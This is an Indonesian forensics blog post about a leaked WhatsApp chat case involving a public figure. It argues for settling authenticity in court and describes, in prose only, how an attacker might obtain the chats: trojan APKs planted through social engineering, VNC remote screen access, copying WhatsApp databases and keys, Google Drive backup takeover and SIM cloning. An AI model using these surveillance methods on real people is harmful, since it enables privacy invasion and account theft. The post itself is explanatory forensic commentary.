Nama HRS jelas-jelas disebut pada Audio dan tertera namanya pada Video Chat. Bagaimana mungkin tidak berhubungan dengan HRS? Bukankah bisa dianalogikan mirip kasus yang baru saja kita ketahui bahwa dipengadilan alkes ada informasi terkait KKN (menerima suap/kolusi/korupsi) yang dilakukan oleh seorang professor doktor, apakah tidak pantas si professor diperiksa secara intens?. Soal palsu atau tidak, bersalah atau tidak, jelas harus dibuktikan di jalur hukum. Tetapi tentu saja tidak cukup dengan asumsi atau kemungkinan-kemungkinan seperti yang dituliskan di artikel tersebut. Kita sebagai awam lebih baik tunggu saja bukti-buktinya di pengadilan, karena bukti bukti pasti akan dibuka dipengadilan. Saya pribadi sebenarnya sejak lama tidak ingin membahas kasus ini, hanya saja saya kuatir banyak pihak yang terjebak dengan asumsi asumsi dan pendapat yang dilatari hoax/berita bohong, sehingga ujung ujungnya banyak masyarakat yang tidak percaya dengan lembaga lembaga yang berwenang seperti Pemerintah dan Kepolisian.
Sebagai ahli digital forensik, idealnya posisinya adalah netral, baik sebelum melakukan pemeriksaan maupun setelah melakukan pemeriksaan. Kita hanya mengungkapkan fakta fakta sebenarnya melalui proses Digital Forensik yang sudah kita ketahui bersama, khususnya bagi yang sudah belajar. Jika sebagai ahli forensik si penulis sudah menarik kesimpulan tanpa melakukan pemeriksaan, apakah pantas disebut ahli Digital Forensik dan menggambarkan seorang lulusan S2 jurusan Forensik Digital? Membela seseorang memang tidak ada salahnya, tetapi jika langsung menyimpulkan sesuatu berdasarkan informasi hanya sekedar �katanya katanya� atau bahkan hoax justru lebih berbahaya. IMHO, justru petugas kepolisian harus melanjutkan kasus ini sehingga terang benderang dengan bukti bukti nanti dipengadilan, dan dipengadilan nanti semua pihak memiliki kesempatan yang sama dalam membela diri. Jika memang tidak bersalah, kenapa takut membuktikannya?
Demikian akhir komentar saya terhadap salah satu artikel yang terkait kasus yang sedang hangat tersebut, sebenarnya ada beberapa artikel lain yang ingin saya bahas, tetapi saya sepertinya kehilangan URLnya, berhubung artikel tersebut sudah lama melintas di timeline saya.
Saya akan lanjutkan membahas beberapa diskusi di TV/Youtube dan status atau komentar di Facebook yang masih berhubungan dengan kasus tersebut.
Saat menonton beberapa diskusi di TV (rekamannya di Youtube) antara Ahli IT vs Penasehat Hukum HRS dan status/diskusi FB, banyak pihak yang mengesampingkan kemungkinan bahwa peretas atau si anonymous melakukan remote akses terhadap perangkat yang terlibat komunikasi. Umumnya mereka, termasuk si Ahli IT terlalu yakin bahwa si pelaku/peng-upload video/audio chat (anonim) tersebut memiliki akses langsung (memegang) perangkatnya, kemudian melakukan print screen/screenshoot dari perangkat langsung, seolah olah itu jalan satu satunya mendapatkan sreenshoot seperti pada video chat. Hal ini juga yang dikait-kaitkan dengan status Barang Bukti perangkat yang diasumsikan masih ditahan di pihak kepolisian, sehingga banyak yang �menuduh� bahwa hanya dari pihak kepolisianlah yang mungkin menyebarkan screenshoot Chat atau video tersebut.
Banyak juga status di FB yang membela HRS dengan membahas keamanan Whatsapp yang telah memanfaatkan end to end encryption sehingga tidak mungkin dilakukan intercept/penyadapan, bahkan pihak kepolisian, dan semuanya terlalu yakin dengan keamanan Whatsapp tersebut. Mereka hanya memahami jika lapisan keamanan hanya pada teknologi enkripsi, penyimpanan data dan saat transmisi/komunikasi saja, dan melupakan keamanan untuk melindungi lapisan lainnya seperti SDM/People Awareness, Physical/Lapisan Fisik dan Policy/Procedure.
Sama halnya dengan kejadian yang baru terjadi beberapa waktu lalu, saat ransomware Wannacry membuat banyak pihak kelabakan, sampai sampai kemkominfo tanpa sadar telah melakukan �teror� terhadap banyak pihak/instansi karena menimbulkan kekuatiran berlebih dengan pengumuman/pemberitaan yang overdosis dilakukan banyak media terkait ransomware tersebut. Prosedur teknis Update/Pencegahan yang sudah dipublikasikan oleh Kemkominfo tetap akan kurang efektif jika security awarenes pengguna komputer tidak ditingkatkan, seperti untuk tidak mengklik attachment yang tidak dikenal atau menginstall software crack-crack-an/bajakan. Karena semua prosedur yang sudah diumumkan tidak mungkin dapat mencegah masuknya ransomware jika kesalahan pada tindakan para pengguna tersebut.
Demikian pula dengan aplikasi Whatsapp, meskipun saat ini whatsapp sudah memanfaatkan end-to-end enkripsi (yang hanya bisa baca pesan hanya perangkat pengirim dan perangkat penerima saja), tetapi jika perangkat sudah disusupi oleh malware/trojan/backdoor, maka tidak akan berguna melindungi informasi tersebut. Karena si hacker bisa melakukan remote akses ke perangkat tanpa disadari pemiliknya.
Si Hacker mungkin saja sudah menargetkan orang-orang tersebut, dengan memanfaatkan teknik teknik �social engineering� sebelumnya, agar pemilik perangkat mau membuka atau menginstall trojan/malware berupa backdoor tersebut. Pada aplikasi mobile/Smarphone, tidak sulit bagi hacker membuatkan trojan/backdoor, misalnya aplikasi.APK di Android dst. Setelah trojan terpasang di perangkat, maka hacker sangat dimungkinkan akan mampu akses ke perangkat melalui backdoor/trojan secara remote tanpa disadari pemilik perangkat. Kemudian dapat memasang/menginstall atau mengaktifkan aplikasi sejenis remote desktop, Contoh di Android biasanya menggunakan VNC Server (Droid VNC Server). Dengan membuat semacam tunnel, sangat mudah bagi hacker untuk mengakses layar target secara remote dari Perangkat PC/Laptop/Mobile si hacker, dan mengoperasikannya seperti mengoperasikan secara langsung. membuka Whatsapp dst. Dengan teknik ini juga si hacker dimungkinkan mampu merekam microphone perangkat, sehingga di video yang ada suara terdengar seperti monolog. Bisa jadi karena hacker memang saat itu hanya mampu merecord Microphone dari perangkat, sehingga yang terekam adalah suara pemilik perangkat.
Metode lain yang mungkin dilakukan hacker selain mengakses aplikasi WA secara remote adalah dengan mendownload hasil backup database Whatsapp yang ada di direktory Whatsapp/Databases dan file kunci (key)-nya. Kemudian mencopy database menginstall WA di perangkat yang sudah disediakan, dan merestore (secara otomatis ) database tersebut saat instalasi.
Metode lainnya, bisa juga dengan dari hasil take over account email yang digunakan setelah berhasil menyisipkan malware/trojan pada perangkat mobile yang mungkin kebetulan digunakan juga untuk backup google drive yang menyimpan backup Whatsapp pemilik perangkat, dan kemudian melakukan penyadapan pada SMS/GSM atau melakukan cloning Nomor GSM untuk didaftarkan pada perangkat lain yang disiapkan si hacker/Anonymous. Setelah terpasang, maka database WA diperangkat dapat langsung tersyncronize dari hasil backup google drive.
Dan mungkin masih ada metode lainnya, silahkan cari sendiri.. pembaca budiman :). Beberapa orang mungkin berfikir seperti �katak dalam tempurung�, dan merasa sudah menguasai setiap teknologi yang biasa digunakan, sehingga kadang langsung membatasi diri dengan asumsi asumsi yang dangkal. Ada baiknya kita selalu berfikir �How� ~ bagaimana caranya. Sehingga diharapkan tetap terus belajar dan tidak membatasi diri dengan pengetahuan yang minim. Saya yakin masih ada metode lain yang mungkin dilakukan oleh si Anonim.
Jika ada pertanyaan terkait tampilan WA di Video, kenapa gambar gambar yang dikirimkan pada video chat tersebut tidak muncul di layar chat, tetapi hanya muncul di luar kolom chat (melalui video editing). Ada beberapa kemungkinan, jika dicermati dari beberapa bagian chat WA yang ada di video chat tersebut terlihat jika waktu melakukan capture chat WAnya berdurasi rentang waktu yang sangat lama, dan terdiri dari banyak pesan, baik yang berasal dari si penerima maupun si pengirim pesan. Hal ini terlihat juga dari perbandingan posisi kursor dengan jumlah pesan chatnya. Sehingga dimungkinkan pesan pesan ini bisa saja sudah hasil recovery backup sebelumnya, seperti dari google drive atau database lokal, yang mana dapat terjadi ketika WA terinstall ulang/aplikasi pernah rusak/corrupt, atau berpindah/pergantian perangkat dst. Saat WA terinstall ulang dan memasukkan nomor yang sama, maka proses recovery bisa saja tidak menyertakan video/gambar gambar yang lama (karena tidak dipilih/diincludekan saat melakukan backup). Jadi gambar gambar ini bisa saja memang tidak muncul (tidak terecovery) di perangkat aslinya, atau hanya tidak muncul di perangkat pelaku yang melakukan recovery dengan method yang dijelaskan diatas, tetapi diperangkat aslinya bisa saja gambar tersebut benar masih ada/muncul. Hal inilah yang juga perlu dikonfirmasikan dengan hasil digital forensik nantinya. Apakah gambar gambar tersebut memang masih ada atau sudah terhapus. Jikapun terhapus, untuk file gambar relatif lebih mudah recoverynya, dibandingkan dengan chat WA yang sudah terhapus (tanpa ada backup). Mengapa? Karena untuk gambar/image, biasanya aplikasi pembuka spt gallery pasti akan membuatkan thumbnail dan melalui process caching yang disimpan di storage, dan bahkan sering berulang kali, sehingga saat recovery file (deleted) dengan Akusisi dan Extraksi secara Fisikal, sering ditemukan hingga beberapa file aslinya. Berbeda dengan pesan WA (khususnya yang tanpa Backup/database terenkripsi), ketika pesan di hapus, maka di database WA (DB lokal berupa SQLite) juga akan terhapus/teredit, dan rentan sekali untuk ter-overwite oleh pesan pesan yang baru masuk, karena masih menggunakan nama file dan lokasi inode/cluster yang sama pada storage (WA.db/Chat.db).
Demikian artikel ini saya posting sebagai pengetahuan bersama khususnya berkaitan dengan digital forensik. Sebenarnya masih ada bagian yang belum sempat dibahas. Semoga masih ada kesempatan lain untuk menuliskannya. Silahkan berdiskusi melalui kolom komentar dibawah.
Semoga bermanfaat .
Sumber : infosec.id